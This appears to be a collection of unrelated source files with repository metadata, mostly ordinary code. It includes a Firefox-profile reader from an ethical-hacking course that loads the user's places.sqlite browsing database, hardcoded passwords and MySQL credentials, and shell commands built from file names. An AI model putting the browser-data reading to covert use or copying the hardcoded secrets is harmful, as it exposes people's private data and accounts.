el = ElementFinder(driver, 312,810)
el.click()
el.send_keys('Sommar2018')
driver.back()
time.sleep(2)
el = ElementFinder(driver, 216,1479)
el.click()
time.sleep(2)
el = ElementFinder(driver, 777,1017)
el.click()
time.sleep(2)
el = ElementFinder(driver, 177,1339)
el.click()
time.sleep(2)
el = ElementFinder(driver, 731,283)
el.click()
time.sleep(2)
el = ElementFinder(driver, 405,920)
el.click()
time.sleep(2)
el = ElementFinder(driver, 554,115)
el.click()
time.sleep(2)
el = ElementFinder(driver, 39,1441)
el.click()
time.sleep(2)
el = ElementFinder(driver, 39,1581)
el.click()
time.sleep(2)
el = ElementFinder(driver, 0,72)
el.click()
time.sleep(2)
el = ElementFinder(driver, 48,660)
el.click()
time.sleep(2)
el = ElementFinder(driver, 0,72)
el.click()
time.sleep(2)
el = ElementFinder(driver, 0,72)
el.click()
time.sleep(2)
el = ElementFinder(driver, 969,312)
el.click()
time.sleep(2)
el = ElementFinder(driver, 969,940)
el.click()
driver.press_keycode(3)
driver.close_app()
driver.quit()
print('TestCase finished successfully')
|
[
"32592901+Georgesarkis@users.noreply.github.com"
] |
32592901+Georgesarkis@users.noreply.github.com
|
2b7e4631b4f29246d007524d058aaac3d67a8629
|
4c91879e3bb3ef24cd4d1d2c79eedecc7030c2e8
|
/python/191_number_of_1_bits.py
|
131d0670c4972e14a4560d586b35fe92f7a62424
|
[
"MIT"
] |
permissive
|
PepSalehi/leetcode-soln
|
a47d827c2973ad06d22d0b8b83f2fadfb5b283d1
|
cbf2db0d81d5ef98f48c8d1df486559f89142bfd
|
refs/heads/master
| 2020-09-15T14:14:11.422791
| 2018-04-19T15:27:38
| 2018-04-19T15:27:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 572
|
py
|
"""
Write a function that takes an unsigned integer and returns the number of '1'
bits it has (also known as the Hamming weight).
For example, the 32-bit integer '11' has binary representation
00000000000000000000000000001011, so the function should return 3.
Credits:
Special thanks to @ts for adding this problem and creating all test cases.
"""
class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
sum1=0
while n>0:
sum1+=n%2
            n //= 2  # integer division, so the loop also terminates on Python 3
return sum1
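# A minimal illustrative check, added here for clarity rather than taken from the
# original submission: it exercises the example from the problem statement above,
# where 11 == 0b1011 contains three set bits.
if __name__ == "__main__":
    assert Solution().hammingWeight(11) == 3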
|
[
"ufjfeng@users.noreply.github.com"
] |
ufjfeng@users.noreply.github.com
|
4b25a66c3105bc9c257188f19dd63ec0e14d457a
|
af7050b659e48a979809a705066baf7cd1a84255
|
/350_intersection-of-two-arrays-ii.py
|
72c4b527f143261a9739c1272e905024c6f6b4b7
|
[] |
no_license
|
zyk930/leetcode
|
b9547cbbeaf0202c2bb3e1a22d30f1ecddd4244e
|
27c9da844550080c41fae60906274347f9e62919
|
refs/heads/master
| 2020-04-10T15:13:45.886717
| 2019-06-04T01:37:10
| 2019-06-04T01:37:10
| 161,101,906
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,302
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/12/21 10:10
# @Author : zyk
'''
Given two arrays, write a function to compute their intersection.
Example 1:
Input: nums1 = [1,2,2,1], nums2 = [2,2]
Output: [2,2]
Example 2:
Input: nums1 = [4,9,5], nums2 = [9,4,9,8,4]
Output: [4,9]
Note:
Each element in the result should appear as many times as it occurs in both arrays.
The result can be returned in any order.
Follow up:
What if the given arrays are already sorted? How would you optimize your algorithm?
What if nums1's size is much smaller than nums2's? Which approach is better?
What if the elements of nums2 are stored on disk, memory is limited, and you cannot
load all of the elements into memory at once - what would you do?
'''
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
ans = []
nums1.sort()
nums2.sort()
i = j = 0
while i < len(nums1) and j < len(nums2):
if nums1[i] < nums2[j]:
i += 1
elif nums1[i] > nums2[j]:
j += 1
else:
ans.append(nums1[i])
i += 1
j += 1
return ans
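# A minimal illustrative check, added here for clarity rather than taken from the
# original submission: it reproduces the two examples from the problem statement above.
if __name__ == "__main__":
    assert sorted(Solution().intersect([1, 2, 2, 1], [2, 2])) == [2, 2]
    assert sorted(Solution().intersect([4, 9, 5], [9, 4, 9, 8, 4])) == [4, 9]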
|
[
"zhouyk@buaa.edu.cn"
] |
zhouyk@buaa.edu.cn
|
0c8c29ae00b620614383c24a6b9db48d3c488117
|
27a8692c6bed25bd92868a519d95e9570ea204cd
|
/bot/handlers/stickers/remove.py
|
d477b5721bf292f79c74e4fc29fa806ac467e504
|
[
"MIT"
] |
permissive
|
metti61680/sticker-thief
|
f3d7fc49a3337eaead84d4d682fac98cd367fc5a
|
3006b8367f8e09aab1e60428338021b95e5d0b13
|
refs/heads/master
| 2020-12-14T02:23:41.684888
| 2019-12-04T11:27:28
| 2019-12-04T11:27:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,203
|
py
|
import logging
# noinspection PyPackageRequirements
from telegram.ext import (
CommandHandler,
MessageHandler,
ConversationHandler,
CallbackContext,
Filters
)
# noinspection PyPackageRequirements
from telegram import ChatAction, Update
from bot import stickersbot
from bot.strings import Strings
from bot.sticker import StickerFile
import bot.sticker.error as error
from ..fallback_commands import cancel_command
from ...utils import decorators
from ...utils import utils
logger = logging.getLogger(__name__)
WAITING_STICKERS = range(1)
@decorators.action(ChatAction.TYPING)
@decorators.restricted
@decorators.failwithmessage
def on_remove_command(update: Update, _):
logger.info('/remove')
update.message.reply_text(Strings.REMOVE_STICKER_SELECT_STICKER)
return WAITING_STICKERS
@decorators.action(ChatAction.TYPING)
@decorators.failwithmessage
def on_sticker_receive(update: Update, context: CallbackContext):
    logger.info('user sent the sticker to remove')
sticker = StickerFile(update.message.sticker)
pack_link = utils.name2link(update.message.sticker.set_name)
try:
sticker.remove_from_set(context.bot)
except error.PackInvalid:
update.message.reply_html(Strings.REMOVE_STICKER_FOREIGN_PACK.format(pack_link), quote=True)
except error.PackNotModified:
update.message.reply_html(Strings.REMOVE_STICKER_ALREADY_DELETED.format(pack_link), quote=True)
except error.UnknwonError as e:
update.message.reply_html(Strings.REMOVE_STICKER_GENERIC_ERROR.format(pack_link, e.message), quote=True)
else:
# success
update.message.reply_html(Strings.REMOVE_STICKER_SUCCESS.format(pack_link), quote=True)
finally:
# wait for other stickers
return WAITING_STICKERS
stickersbot.add_handler(ConversationHandler(
name='adding_stickers',
entry_points=[CommandHandler(['remove', 'rem', 'r'], on_remove_command)],
states={
WAITING_STICKERS: [MessageHandler(
Filters.sticker | Filters.document.category('image/png'),
on_sticker_receive
)]
},
fallbacks=[CommandHandler(['cancel', 'c', 'done', 'd'], cancel_command)]
))
|
[
"numeralzeroone@gmail.com"
] |
numeralzeroone@gmail.com
|
672321ebf82e31c14af3274cd5b61a7650715780
|
baf3736092f9aecf79fc717b6d5efc19c5ac3ba9
|
/ArticleSpider_splash/pipelines.py
|
74a77623ba5d113d94d8f288a8a4a0d1124ad2ac
|
[] |
no_license
|
tang1323/ArticleSpider_splash
|
6215224cd5c36a243b950590faf7da2671c4014a
|
992e50f93ba705ffbf3d8282f0c47cd3c9f638f2
|
refs/heads/master
| 2023-04-08T13:07:26.526856
| 2021-04-15T01:55:13
| 2021-04-15T01:55:13
| 358,095,518
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,016
|
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
import codecs  # helps avoid tedious encoding work
import json
from scrapy.pipelines.images import ImagesPipeline
from scrapy.exporters import JsonItemExporter
from twisted.enterprise import adbapi  # lets the MySQLdb operations be executed asynchronously
import MySQLdb
import MySQLdb.cursors
# from models.es_types import ArticleType
# from w3lib.html import remove_tags
class ArticlespiderPipeline(object):
def process_item(self, item, spider):
return item
# pipeline that saves scraped items to a local json file
class JsonWithEncodingPipeline(object):  # stores the data locally
    # custom export to a json file
    def __init__(self):
        self.file = codecs.open('article.json', 'w', encoding="utf-8")
    def process_item(self, item, spider):  # process_item must have exactly this name and signature
        lines = json.dumps(dict(item), ensure_ascii=False) + "\n"  # convert the item to a dict before dumping
        self.file.write(lines)  # write the line to the file
        return item
    def spider_closed(self, spider):  # close the file; spider_closed must have exactly this name and signature
        self.file.close()
class MysqlPipeline(object):
    # Writes to MySQL synchronously. This is fine when the volume is small; for larger volumes
    # use the twisted-based approach instead - the MysqlTwistedPipline class below is the standard way.
    def __init__(self):
        self.conn = MySQLdb.connect('localhost', 'tangming', '130796', 'article_spider', charset="utf8", use_unicode=True)
        self.cursor = self.conn.cursor()  # the cursor is used to execute database statements
    def process_item(self, item, spider):  # builds and runs the mysql insert statement
insert_sql = """
insert into cnblogs_article(title, url, url_object_id, front_image_url, front_image_path, praise_nums, comment_nums, tags, content, create_date, fav_nums)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)ON DUPLICATE KEY UPDATE fav_nums = VALUES(fav_nums)
"""
params = list()
params.append(item.get("title", ""))
params.append(item.get("url", ""))
params.append(item.get("url_object_id", ""))
        front_image = ",".join(item.get("front_image_url", []))  # this is the only field that is still a list; join it into a string right before inserting
        params.append(front_image)
        params.append(item.get("front_image_path", ""))
        params.append(item.get("praise_nums", 0))  # defaults to 0 when no data
        params.append(item.get("comment_nums", 0))  # defaults to 0 when no data
        params.append(item.get("tags", ""))
        params.append(item.get("content", []))
        params.append(item.get("create_date", "1970-07-01"))
        params.append(item.get("fav_nums", 0))  # defaults to 0 when no data
        self.cursor.execute(insert_sql, tuple(params))  # synchronous: the next statement only runs once this one finishes
        self.conn.commit()  # synchronous: the next statement only runs once this one finishes
        # which is why an asynchronous approach is needed
return item
# this pipeline inserts into the database asynchronously
class MysqlTwistedPipline(object):
    def __init__(self, dbpool):  # receives the connection pool
self.dbpool = dbpool
@classmethod
def from_settings(cls, settings):
# from MySQLdb.cursors import DictCursor
dbparms = dict(
host = settings["MYSQL_HOST"],
db = settings["MYSQL_DBNAME"],
user = settings["MYSQL_USER"],
password = settings["MYSQL_PASSWORD"],
charset ='utf8',
cursorclass = MySQLdb.cursors.DictCursor,
use_unicode = True
)
        dbpool = adbapi.ConnectionPool("MySQLdb", **dbparms)  # ConnectionPool is a connection pool - the key piece here
return cls(dbpool)
    def process_item(self, item, spider):  # builds and runs the mysql insert statement
        # use twisted to turn the mysql insert into an asynchronous operation
        query = self.dbpool.runInteraction(self.do_insert, item)  # dbpool acts as a container
        query.addErrback(self.handle_error, item, spider)  # handle exceptions; handle_error is just a method we defined, and item/spider are passed along so the error message can include whatever is useful
        return item
    def handle_error(self, failure, item, spider):  # failure is passed in by twisted
        # handle exceptions raised by the asynchronous insert
        print(failure)  # this is the key debugging entry point: any exception raised while writing scraped data to the database shows up here
    def do_insert(self, cursor, item):  # this cursor is passed in by adbapi itself
        # perform the actual insert
        # build the appropriate sql statement for each item type and insert it into mysql
# insert_sql = """
# insert into cnblogs_article(title, url, url_object_id, front_image_url, front_image_path, praise_nums, comment_nums, tags, content, create_date, fav_nums)
# VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)ON DUPLICATE KEY UPDATE create_date = VALUES(create_date)
# """
# params = list()
# params.append(item.get("title", ""))
# params.append(item.get("url", ""))
# params.append(item.get("url_object_id", ""))
# front_image = ",".join(item.get("front_image_url", []))
# params.append(front_image)
# params.append(item.get("front_image_path", ""))
        # params.append(item.get("praise_nums", 0))  # defaults to 0 when no data
        # params.append(item.get("comment_nums", 0))  # defaults to 0 when no data
# params.append(item.get("tags", ""))
# params.append(item.get("content", []))
# params.append(item.get("create_date", "1970-07-01"))
        # params.append(item.get("fav_nums", 0))  # defaults to 0 when no data
# cursor.execute(insert_sql, tuple(params))
insert_sql, params = item.get_insert_sql()
cursor.execute(insert_sql, params)
class JsonExporterPipleline(object):
    # use the json exporter provided by scrapy to export a json file
def __init__(self):
self.file = codecs.open('articleexport.json', 'wb')
self.exporter = JsonItemExporter(self.file, encoding = "utf-8", ensure_ascii= False)
self.exporter.start_exporting()
def spider_closed(self, spider):
self.exporter.finish_exporting()
self.file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item
# only handles the cover image
class ArticleImagePipeline(ImagesPipeline):
def item_completed(self, results, item, info):
        # only run the statements below when a cover image exists (e.g. Zhihu items have no cover image)
if "front_image_url" in item:
image_file_path = ""
for ok, value in results:
image_file_path = value["path"]
item["front_image_path"] = image_file_path
return item
|
[
"1171242903@qq.com"
] |
1171242903@qq.com
|
d0db4dd53fc928a47070993d812e526112a25bb3
|
4a0f8c5c0e8324fa614da776f2a704b5c369ccbb
|
/Contact_maps/dealFile.py
|
5816c559c07cbd917443fb8e7f1b4a6c81f4de53
|
[] |
no_license
|
magic2du/contact_matrix
|
9f8ae868d71e7e5c8088bf22a9407ea3eb073be6
|
957e2ead76fabc0299e36c1435162edd574f4fd5
|
refs/heads/master
| 2021-01-18T21:15:07.341341
| 2015-09-16T02:14:53
| 2015-09-16T02:14:53
| 24,237,641
| 0
| 0
| null | 2015-09-10T19:58:24
| 2014-09-19T16:48:37
| null |
UTF-8
|
Python
| false
| false
| 2,197
|
py
|
import os
def readListFile(filename):#read file:filename lines into list
data_file = open(filename)
data = []
for line in data_file.readlines():
line = line.strip()
#print line
data.append(line)
data_file.close()
print "number of lines in %s:" %filename +str(len(data))
return data
def readGrepFile(filename):#read ddis greped log File into list.ie SUCCESS_log_file
data_file = open(filename)
data = []
for line in data_file.readlines():
temp1 = line.split(" ")
line = temp1[3].split(",")
line=line[0]
line=line.strip()
data.append(line)
''' print(line)
line = line.split(" ")
t1 = line[1].split(":")
t2 = line[2].split(":")
tmp = [float(t1[1]), float(t2[1]), int(line[0])]
data.append(tmp)
print tmp'''
print "number of lines in %s:" %filename +str(len(data))
data_file.close()
return data
def writeListFile(filename,lst):# write lst into filename.
data_file = open(filename,'w')
for item in lst:
data_file.write("%s\n" % item)
print "number of lines wrote in %s:" %filename +str(len(lst))
data_file.close()
def dealLogFile(filename,listfile):
    #grep the log file (filename) into ERROR and SUCCESS files; collect the unfinished ddis from the todo-list file (listfile) and write them into NotFinished_log
sh='grep ERROR: '+filename+'>ERROR_'+filename
sh2='grep SUCCESS: '+filename+'>SUCCESS_'+filename
os.system(sh)
os.system(sh2)
List1=readListFile(listfile)
List2=readGrepFile('SUCCESS_'+filename)
List3=readGrepFile('ERROR_'+filename)
List4=list(set(List1)-set(List2)-set(List3))
writeListFile('NotFinished_'+filename,List4)
def grepLogFile(filename):
#grep log file(filename) to ERROR and SUCCESS file:
sh='grep ERROR: '+filename+'>ERROR_'+filename
sh2='grep SUCCESS: '+filename+'>SUCCESS_'+filename
os.system(sh)
print sh
os.system(sh2)
print sh2
def readDDIsFile(filename):#read ddi file into a list with two domain names seperated.
data_file = open(filename)
data = []
for line in data_file.readlines():
line = line.strip()
try:
[domain1,domain2]=line.split('_int_')
data.append([domain1,domain2])
except:
print line
data_file.close()
print "number of ddis in %s:" %filename +str(len(data))
return data
|
[
"magic2du@gmail.com"
] |
magic2du@gmail.com
|
9be4c0cfe1528de5ee29c120480cb7e74ee1c110
|
b3ad6d480873ac91fc284efc6341568649898684
|
/cohort/week6/cs1.py
|
b50661dfbe30716c9a6b8392c7f7626cd65dd870
|
[
"MIT"
] |
permissive
|
jamestiotio/DW2020
|
e88af5f84f477e911b8414c02893da039fff9cf0
|
1639ccbcf77b64719bdc29bf2a373d19296fbd75
|
refs/heads/master
| 2022-10-30T12:48:39.147705
| 2022-08-14T12:16:35
| 2022-08-14T12:16:35
| 269,898,881
| 0
| 1
|
MIT
| 2021-11-04T16:30:20
| 2020-06-06T07:03:23
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 142
|
py
|
def reverse(string):
new_string = ""
for char in range(1, len(string) + 1):
new_string += string[-char]
return new_string
|
[
"jamestiotio@gmail.com"
] |
jamestiotio@gmail.com
|
975de9975a9a39cbe4c0d7727322685bc5762de1
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03645/s702030481.py
|
0676433bb304179255b0f58e28e7315e9f4ba85a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 371
|
py
|
from sys import stdin
def input():
return stdin.readline().strip()
n, m = map(int, input().split())
edge = [[] for _ in range(n)]
for _ in range(m):
i, j = map(int, input().split())
i -= 1
j -= 1
edge[i].append(j)
edge[j].append(i)
for i in edge[0]:
if n - 1 in edge[i]:
print('POSSIBLE')
exit()
else:
print('IMPOSSIBLE')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
a89f7551c6e7110c925d5c588dffb97eee504470
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/tensorflow/_api/v1/strings/__init__.py
|
ce1ec660353ce6c9b3396ee91e02d9336d97ded8
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:99d3d433550637101bcb96e96fa3ad768bd4fcf5d594eb911c360868a4a5bf1f
size 2083
|
[
"github@cuba12345"
] |
github@cuba12345
|
c2e523ab1ff7e56a1209026225b6a1f5d1049f9a
|
d62863d049c0206bfa744ca4c9e886030bfce1ab
|
/apps/sw_shop/sw_order/filters.py
|
8fbf2cab68517611516c4be1eb8e79e99f52ae1a
|
[] |
no_license
|
jurgeon018/box
|
51738b99e640202936ed72357d3c67d2517e589b
|
50b84a0afa73fab85a00eef54194f3c126d15397
|
refs/heads/master
| 2021-07-17T13:37:08.665292
| 2020-10-15T09:50:33
| 2020-10-15T09:50:33
| 232,013,297
| 0
| 1
| null | 2020-03-27T02:16:44
| 2020-01-06T03:01:34
|
Python
|
UTF-8
|
Python
| false
| false
| 142
|
py
|
from admin_auto_filters.filters import AutocompleteSelect
class TagsFilter(AutocompleteSelect):
title = 'тег'
field_name = 'tags'
|
[
"jurgeon018@gmail.com"
] |
jurgeon018@gmail.com
|
d1548533bbd4772134b1eb35f4625917f8311929
|
4c2c1775b6b319ae07155f46e70a6726ab0980c2
|
/algo/algo_code/personal/cvr_space/model_train_exp/script/model_predict.py
|
d83956c20f098ea44510c425f8fc4512584682ff
|
[] |
no_license
|
kiminh/util
|
8e4b204849a57941120e37c9330772f03c8892d0
|
763a71031d9c0ef207b87dc03ebc55208a2dd5ad
|
refs/heads/master
| 2022-06-09T06:09:13.221754
| 2020-04-27T04:23:00
| 2020-04-27T04:23:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 385
|
py
|
import sys
import math
model_dict = {}
for raw in open(sys.argv[1]):
felds = raw.strip("\n\r").split(" ")
if len(felds) < 2:
continue
model_dict[felds[0]] = float(felds[1])
for raw in open(sys.argv[2]):
s = 0
for sp in raw.strip().split()[1:]:
        w = model_dict.get(sp, 0)
        s += w
print 1.0 / (1.0 + math.exp(-s))
|
[
"ling@lingdeMacBook-Air.local"
] |
ling@lingdeMacBook-Air.local
|
6d72c628644e2d398d8db125a9bc5a7d8ef0a069
|
79baf4404e51bdc0f33038b3b16bea86ff09e82f
|
/azext_iot/sdk/deviceupdate/controlplane/operations/__init__.py
|
fcfbd4b1f52e9fbba906f0b37ee993a23e66a0b3
|
[
"MIT"
] |
permissive
|
Azure/azure-iot-cli-extension
|
80b6cb29e907f7512c7361a85d6bfdea5ae2dd9e
|
bdbe65c3874ff632c2eba25c762e9ea8e9175b5f
|
refs/heads/dev
| 2023-09-04T10:57:16.118442
| 2023-08-28T17:12:05
| 2023-08-28T17:12:05
| 103,456,760
| 95
| 80
|
NOASSERTION
| 2023-09-13T00:02:54
| 2017-09-13T22:04:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,443
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._device_update_operations import DeviceUpdateOperationsMixin
from ._accounts_operations import AccountsOperations
from ._instances_operations import InstancesOperations
from ._private_endpoint_connections_operations import PrivateEndpointConnectionsOperations
from ._private_link_resources_operations import PrivateLinkResourcesOperations
from ._private_endpoint_connection_proxies_operations import PrivateEndpointConnectionProxiesOperations
from ._operations import Operations
from ._patch import __all__ as _patch_all
from ._patch import * # type: ignore # pylint: disable=unused-wildcard-import
from ._patch import patch_sdk as _patch_sdk
__all__ = [
'DeviceUpdateOperationsMixin',
'AccountsOperations',
'InstancesOperations',
'PrivateEndpointConnectionsOperations',
'PrivateLinkResourcesOperations',
'PrivateEndpointConnectionProxiesOperations',
'Operations',
]
__all__.extend([p for p in _patch_all if p not in __all__])
_patch_sdk()
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
3d556d8e0c6be1368b829f2f9e0d84e4eea75160
|
db12b990924703cd74748d8585cd9c11fafa6746
|
/h2o-py/h2o/schemas/metadata.py
|
9582a1aaee3cc62f7c74ffa2f0fa2e14384a9fc0
|
[
"Apache-2.0"
] |
permissive
|
h2oai/h2o-3
|
919019a8f297eec676011a9cfd2cc2d97891ce14
|
d817ab90c8c47f6787604a0b9639b66234158228
|
refs/heads/master
| 2023-08-17T18:50:17.732191
| 2023-08-17T16:44:42
| 2023-08-17T16:44:42
| 17,371,412
| 6,872
| 2,345
|
Apache-2.0
| 2023-09-14T18:05:40
| 2014-03-03T16:08:07
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,142
|
py
|
# -*- encoding: utf-8 -*-
#
# Copyright 2016 H2O.ai; Apache License Version 2.0 (see LICENSE for details)
#
# noinspection PyUnresolvedReferences
from h2o.utils.compatibility import * # NOQA
class H2OMetadataV3(object):
@classmethod
def make(cls, json_kv_pairs):
return cls(json_kv_pairs)
def __init__(self, json_kv_pairs):
self._schemas = next((v for k, v in json_kv_pairs if k == 'schemas'), []) or []
self._schema = self._schemas[0] if self._schemas else None
self._routes = next((v for k, v in json_kv_pairs if k == 'routes'), []) or []
@property
def name(self):
return self._schema.get('name') if self._schema else None
@property
def fields(self):
return [_Field(f) for f in self._schema.get('fields')] if self._schema else None
@property
def routes(self):
return [_Route(r) for r in self._routes]
def __repr__(self):
return repr({k: getattr(self, k) for k in dir(self) if not k.startswith('_')})
class _Field(object):
def __init__(self, j_field):
self._field = j_field
@property
def name(self):
return self._field.get('name')
@property
def is_schema(self):
return self._field.get('is_schema')
@property
def help(self):
return self._field.get('help')
def __repr__(self):
return repr({k: getattr(self, k) for k in dir(self) if not k.startswith('_')})
class _Route(object):
def __init__(self, j_route):
self._route = j_route
@property
def http_method(self):
return self._route.get('http_method')
@property
def url_pattern(self):
return self._route.get('url_pattern')
@property
def summary(self):
return self._route.get('summary')
@property
def input_schema(self):
return self._route.get('input_schema')
@property
def output_schema(self):
return self._route.get('output_schema')
def __repr__(self):
return repr({k: getattr(self, k) for k in dir(self) if not k.startswith('_')})
|
[
"noreply@github.com"
] |
h2oai.noreply@github.com
|
734bf8211cf76d87497a9023f0a6036d2c89b55b
|
6a33cb94d4af1d8a7329ddc6c9d42f870c35bb2f
|
/python/euler88.py
|
438947a9585065bb73e52c6e4fe46d5db173dc3c
|
[] |
no_license
|
vochong/project-euler
|
836321cc8e7d2e7cdf22b3b136d44dcba74a8701
|
6a0c7103861ff825bf84800b6e2e62819a41e36d
|
refs/heads/master
| 2020-04-29T10:41:48.487159
| 2018-09-19T00:13:34
| 2018-09-19T00:13:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 385
|
py
|
def prodsum(prod, sm, facs, curfac, mins):
    # a product `prod` of `facs` factors with sum `sm` can be padded with (prod - sm)
    # ones to make the sum equal the product, i.e. it is a product-sum number for set size k
    k = prod - sm + facs
    if k < 12000:
        mins[k] = min(mins[k], prod)
    for fac in range(curfac, 24000/prod):
        prodsum(prod*fac, sm+fac, facs+1, fac, mins)
def euler88():
mins = [24000]*12000
prodsum(1, 1, 1, 2, mins)
return sum(set(mins[2:]))
if __name__ == "__main__":
print euler88()
|
[
"kueltz.anton@gmail.com"
] |
kueltz.anton@gmail.com
|
0de714e49f871d8ef0eaad488040bcbabbacca73
|
f3cdb2bae2ca6cbd045941ae0c2f4052e52de622
|
/p2p/dataset.py
|
04e28cc0ef5d167401736ee3081182e3dbb724bd
|
[
"Apache-2.0"
] |
permissive
|
IQTLabs/3-D_DataAugmentation
|
bab6aead07235cccb2056b0ce25179e5bb871a82
|
3eb7fe156906df46151de5c4472274a1ccdcfbed
|
refs/heads/master
| 2023-01-21T15:57:39.173956
| 2020-12-03T20:23:18
| 2020-12-03T20:23:18
| 298,663,332
| 0
| 0
|
Apache-2.0
| 2023-01-23T13:56:28
| 2020-09-25T19:32:59
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,028
|
py
|
import numpy as np
from PIL import Image
from torch.utils.data import Dataset
from torchvision import transforms
__all__ = ['P2PDataset']
class P2PDataset(Dataset):
""" Pose to Pose dataset definition loads two frame/pose pairs
"""
def __init__(self, df=None, transform=None, data_path=''):
""" Dataset initialization
Parameters
----------
df : pd.DataFrame
Dataframe with datapoint metadata
transform : torchvision.transforms
            Frame preprocessing transforms. Not applied to poses
data_path : str
Global path to data directory
Returns
-------
"""
self.df = df
self.data_path = data_path
if transform is None:
self.transform = transforms.ToTensor()
else:
self.transform = transform
self.to_tensor = transforms.ToTensor()
def __getitem__(self, idx):
""" Returns dataset item
Parameters
----------
idx : int
Index for desired datapoint
Returns
-------
frames[0] : torch.tensor
First (input) frame
frames[1] : torch.tensor
Second (target) frame
pose : torch.tensor
Second (target) pose
"""
entry = self.df.iloc[idx]
dir_path = '{}/{}/{}'.format(self.data_path,
entry['name'], entry['snippet'])
index = np.random.choice([x for x in range(5)], 2, replace=False)
frames = [self.transform(Image.open(
'{}/frame_{}.jpg'.format(dir_path, x))) for x in index]
pose = self.to_tensor(Image.open(
'{}/pose_{}.jpg'.format(dir_path, index[-1])))
return frames[0], frames[1], pose
    def __len__(self):
        """ Length of the dataset
Parameters
----------
Returns
-------
len : int
Len of dataframe/dataset
"""
return len(self.df)
|
[
"mllomnitz@gmail.com"
] |
mllomnitz@gmail.com
|
c2615df1c73b8edf1406f870f6e2f819b8bd4f9f
|
25d4c31d5ebe470118b14beb84f3cd1e53d99c15
|
/01_Tutorials/Udemy Kurs Ehical Hacking/06_Praxisprojekt_Firefox_Daten_auslesen/48_Profilordner_Firefox_Alle_OS_Call_function.py
|
a59ecffd3590e860a7e464367aafb21873f9b8a1
|
[] |
no_license
|
daltdoerfer/Python_Templates-1
|
ea4b59489feb7b7617e81b7c94d4375dbf25def3
|
c2471cebeaf20bbfdfd3fd263d458e5a67ad8d1e
|
refs/heads/master
| 2023-05-10T15:07:10.109280
| 2021-06-08T06:45:53
| 2021-06-08T06:45:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 846
|
py
|
# Documentation for places.sqlite: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/Places/Database
# e.g. bookmarks live in moz_bookmarks
import os
import sqlite3  # database package used to read the database
import pandas as pd
from get_firefox_path import get_firefox_path
# Alternative: import get_firefox_path as gfp  # -> the function call would then have to be gfp.get_firefox_path()
##############################################################################
# Function call
##############################################################################
path = get_firefox_path("places.sqlite")
#os.startfile('C:\\Users\\James/AppData/Roaming/Mozilla/Firefox/Profiles')  # open the folder for inspection
conn = sqlite3.connect(path)
print(conn)
# Output as a pandas DataFrame
df = pd.read_sql("SELECT * FROM moz_bookmarks", conn)
print(df)
|
[
"daltdoerfer@yahoo.com"
] |
daltdoerfer@yahoo.com
|
4f442defc3e20cd08d0d0bd1c7cfecc372987eaf
|
f52997ac7e1b41f34018c3a0028ced8638072b2b
|
/src/feedback/migrations/0002_migrate_search_feedback.py
|
99e69225ca6320d0a38a794a12ad8bb49a371897
|
[
"MIT"
] |
permissive
|
uktrade/digital-workspace-v2
|
49fae1fca819b625c6f6949fb5ce51b89fbcab96
|
7e328d0d55c9aa73be61f476823a743d96e792d0
|
refs/heads/main
| 2023-09-03T12:03:47.016608
| 2023-09-01T12:07:55
| 2023-09-01T12:07:55
| 232,302,840
| 6
| 0
|
MIT
| 2023-09-13T15:50:24
| 2020-01-07T10:41:18
|
Python
|
UTF-8
|
Python
| false
| false
| 999
|
py
|
# Generated by Django 4.1.10 on 2023-08-08 14:35
from django.db import migrations
def migrate_search_feedback(apps, schema_editor):
Feedback = apps.get_model("django_feedback_govuk", "Feedback")
SearchFeedbackV1 = apps.get_model("feedback", "SearchFeedbackV1")
for feedback in Feedback.objects.all():
search_feedback = SearchFeedbackV1.objects.create(
submitter=feedback.submitter,
satisfaction=feedback.satisfaction,
comment=feedback.comment,
)
# Update the base feedback model with the submitted_at field to override the auto_now_add
